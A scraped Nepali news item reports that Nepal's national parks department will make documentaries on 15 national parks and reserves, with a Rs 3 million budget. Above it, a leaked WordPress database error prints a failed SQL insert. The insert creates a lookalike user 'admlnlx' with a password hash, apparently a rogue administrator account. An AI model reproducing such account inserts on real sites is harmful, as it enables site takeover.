WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEOBTG5MaYKnAqG6ywB7gJYNtqjsGQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 13:41:31', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २८ –
आर्थिक वर्ष २०७३÷७४ मा राष्ट्रिय निकुञ्ज तथा वन्यजन्तु आरक्षण संरक्षण विभागले १५ राष्ट्रिय निकुञ्ज तथा वन्यजन्तु आरक्षको वृत्तचित्र निर्माण गर्ने भएको छ ।
विभागले राष्ट्रिय निकुञ्ज तथा वन्यजन्तु आरक्षण क्षेत्रको वस्तुस्थिति बुझ्न तथा त्यस क्षेत्रको जैविक विविधताको अध्ययन गर्नका लागि वृत्तचित्र निर्माण गर्न लागेको हो । विभागका सूचना अधिकारी नारायण रुपाखेतीले राष्ट्रिय निकुञ्ज तथा वन्यजन्तु आरक्षबारे जानकारी दिन वृत्तचित्र निर्माण गर्न लागेको जानकारी दिनुभयो ।
यस्तै वृत्तचित्रमा सोही राष्ट्रिय निकुञ्ज तथा वन्यजन्तु आरक्षमा पाइने वन्यजन्तु, पशुपक्षी, घाँस, बिरुवा, त्यस क्षेत्रको ‘वफर जोन’लगायत समावेश हुने रुपाखेतीले बताउनुभयो । उक्त वृत्तचित्र निर्माणका लागि विभागले रु तीस लाख बजेट विनियोजन गरेको छ । उक्त निर्माण भएको वृत्तचित्र विभागको स्वामित्वमा रहने रुपाखेतीले बताउनुभयो ।
छुट्टाछुटै राष्ट्रिय निकुञ्जले आ–आफ्नो तरिकाले वृत्तचित्र निर्माण गरे पनि विभागको पहलमा भने यस्तो वृत्तचित्र बन्न लागेको पहिलो पटक हो । – रासस